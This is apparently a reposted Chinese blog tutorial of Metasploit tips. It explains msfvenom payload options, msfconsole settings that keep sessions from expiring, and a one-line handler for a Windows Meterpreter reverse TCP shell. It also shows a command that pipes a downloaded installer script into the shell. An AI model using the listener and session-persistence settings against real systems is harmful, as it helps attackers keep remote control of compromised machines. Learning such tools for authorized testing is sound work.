msf中存在很多隐藏的技巧。你都知道吗?本文让我们一起来愉快的学习吧。
msfvenom篇
msfvenom是我们最常用的生成Shell的工具之一。也是我们初学者最早接触的工具。首先来看看他的命令说明吧!
msfvenom -h
这里我将最常用的几个命令进行简单的说明:
-
-p指定需要使用的payload(攻击荷载) -
-f指定输出格式 -
-e指定需要使用的编码 -
-a指定payload的目标架构,例如x86 x64 -
-i指定payload的编码次数 -
-o指定创建好的payload的存放位置
msfconsole篇
防止假session
有时候我们会经常会遇到假session或者刚连接就断开的情况,这时候我们可以设置参数,防止假死与假session。
set ExitOnSession false
防止session断开
通常情况下,会话在一个星期后将被强制关闭,修改如下可长期保持。
set SessionExpirationTimeout 0
快速建立监听
通常我们需要在msf控制台。配置各类参数,显得很麻烦。这里为大家提供更加便捷的建立监听的方式。
handler -H 192.168.5.28 -P 5555 -p windows/meterpreter/reverse_tcp
命令自动补全
msfconsole的命令众多,并且不容易记住。这里我们可以利用zsh的一款插件,自动补全相应的命令。 在kali中终端默认安装了zsh 我们需要安装ohmyz
sh -c “$(wget https://raw.github.com/robbyrussell/oh-my-zsh/master/tools/install.sh -O -)”
下载自动补全插件
git clone https://github.com/Green-m/msfvenom-zsh-completion ~/.oh-my-zsh/custom/plugins/msfvenom/
修改配置文件
vim ~./zshrc
修改71行 与 最后添加两行
plugins=(git msfvenom) #修改71行
fpath=(~/.zsh/completion $fpath)
autoload -Uz compinit && compinit -i
这样便完成了msf控制台命令自动补全功能。刚兴趣的快去试试吧!
更多精彩文章 欢迎关注我们
原文始发于微信公众号(kali黑客笔记):msfconsole那些隐藏的技能 你知道多少?
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论